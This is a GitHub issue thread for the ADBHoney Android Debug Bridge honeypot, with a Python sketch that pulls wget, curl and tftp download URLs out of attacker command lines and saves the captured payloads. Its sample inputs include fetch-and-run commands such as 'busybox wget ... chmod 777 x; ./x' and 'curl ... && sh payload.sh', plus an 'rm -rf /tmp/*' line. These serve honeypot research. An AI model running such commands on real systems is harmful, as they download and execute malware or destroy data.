huuck / ADBHoney

Low interaction honeypot designed for Android Debug Bridge over TCP/IP
GNU General Public License v3.0

Extract links from the commands #5

Open fe7ch opened 5 years ago

fe7ch commented 5 years ago

I've noticed that sometimes an attacker only executes some commands instead of dropping a binary directly.

The commands usually include a wget/curl call, so it would be nice to parse the command line & try to download the payload.

fe7ch commented 5 years ago

As @HermanusF and @bontchev mentioned, this functionality should be optional, so some command line/config option should be present to disable it if needed. Imho it should be turned on by default.

bontchev commented 5 years ago

Indeed. I was thinking of the following: split the input line by the semicolon character, for each part, check if it begins with (optionally) busybox, followed by wget, curl or tftp. Then extract the URL from the command (this is particularly hard for tftp; the others can be handled just with a regular expression), download the file (optionally) and save it in the usual format (file name derived from the hash of its contents). Maybe log if download was successful (e.g., it might fail if the repository from where it tries to download no longer exists).
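The parsing scheme sketched in this comment, as an added example that is not ADBHoney's own code: split the line into individual commands, drop an optional `busybox` prefix, recognise `wget`/`curl`/`tftp`, pull out the URL (by regular expression for the HTTP tools, by argument walking for busybox-style `tftp -g -r FILE HOST [PORT]`), and name any saved payload after the SHA-256 of its contents. It goes slightly beyond the comment by also splitting on `&&`, `||` and `|`, since attackers chain commands that way too. The sample command lines, the IP addresses (from documentation ranges) and the function names are all constructed for the example; the actual download is kept behind a flag so the module runs offline.

```python
import hashlib
import os
import re
import shlex
import urllib.request

# Constructed sample command lines of the kind the issue describes (not real captures).
SAMPLE_COMMANDS = [
    "cd /data/local/tmp; busybox wget http://192.0.2.10/x86 -O x; chmod 777 x; ./x",
    "curl -sO http://203.0.113.7/payload.sh && sh payload.sh",
    "tftp -g -r bot.arm -l /tmp/bot 198.51.100.4 6969",
    "rm -rf /tmp/*; ls",
]

DOWNLOADERS = {"wget", "curl", "tftp"}
# Stop a URL at whitespace, quotes and shell metacharacters.
URL_RE = re.compile(r"https?://[^\s'\";|&<>]+")


def split_commands(line):
    """Split a shell line on ';', newlines, '&&', '||' and '|' into separate commands."""
    return [p.strip() for p in re.split(r"[;\n]|&&|\|\||\|", line) if p.strip()]


def tftp_url(args):
    """Build a tftp:// URL from busybox-style 'tftp -g -r REMOTE [-l LOCAL] HOST [PORT]'.

    The interactive 'tftp HOST' + 'get FILE' form is not handled (assumption: the
    one-shot busybox form is what shows up in honeypot command lines).
    """
    remote = None
    positional = []
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in ("-r", "-l") and i + 1 < len(args):
            if arg == "-r":
                remote = args[i + 1]
            i += 2
            continue
        if arg.startswith("-"):      # -g, -p and other flags take no value here
            i += 1
            continue
        positional.append(arg)
        i += 1
    if remote is None or not positional:
        return None
    host = positional[0]
    port = positional[1] if len(positional) > 1 else "69"
    return f"tftp://{host}:{port}/{remote}"


def extract_download_urls(line):
    """Return the URLs fetched by wget/curl/tftp (optionally prefixed by busybox) in a line."""
    urls = []
    for cmd in split_commands(line):
        try:
            argv = shlex.split(cmd)
        except ValueError:           # unbalanced quotes: fall back to a plain split
            argv = cmd.split()
        if argv and argv[0] == "busybox":
            argv = argv[1:]
        if not argv or argv[0] not in DOWNLOADERS:
            continue
        if argv[0] == "tftp":
            url = tftp_url(argv[1:])
            if url:
                urls.append(url)
        else:
            urls.extend(URL_RE.findall(cmd))
    return urls


def payload_filename(data):
    """File name derived from the SHA-256 of the contents, as the issue proposes."""
    return hashlib.sha256(data).hexdigest()


def save_payload(data, directory):
    """Write the payload under its hash name; returns the path (existing files are kept)."""
    os.makedirs(directory, exist_ok=True)
    path = os.path.join(directory, payload_filename(data))
    if not os.path.exists(path):
        with open(path, "wb") as fh:
            fh.write(data)
    return path


def fetch_http(url, timeout=10):
    """Download an http(s) URL; returns bytes, or None if the server is gone (log that)."""
    if not url.startswith(("http://", "https://")):   # stdlib has no tftp client
        return None
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read()
    except Exception as exc:          # hypothetical: replace with the honeypot's logger
        print(f"download failed for {url}: {exc}")
        return None


def collect_payloads(line, directory, download=False):
    """Parse a captured line; download and save each payload only when enabled by config."""
    saved = []
    for url in extract_download_urls(line):
        print(f"download URL seen: {url}")
        if download:
            data = fetch_http(url)
            if data is not None:
                saved.append(save_payload(data, directory))
    return saved


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(cmd, "->", extract_download_urls(cmd))
```

Downloading stays off by default in this sketch (`download=False`) so the parser can be exercised without network access; the config switch the earlier comments ask for would map onto that flag.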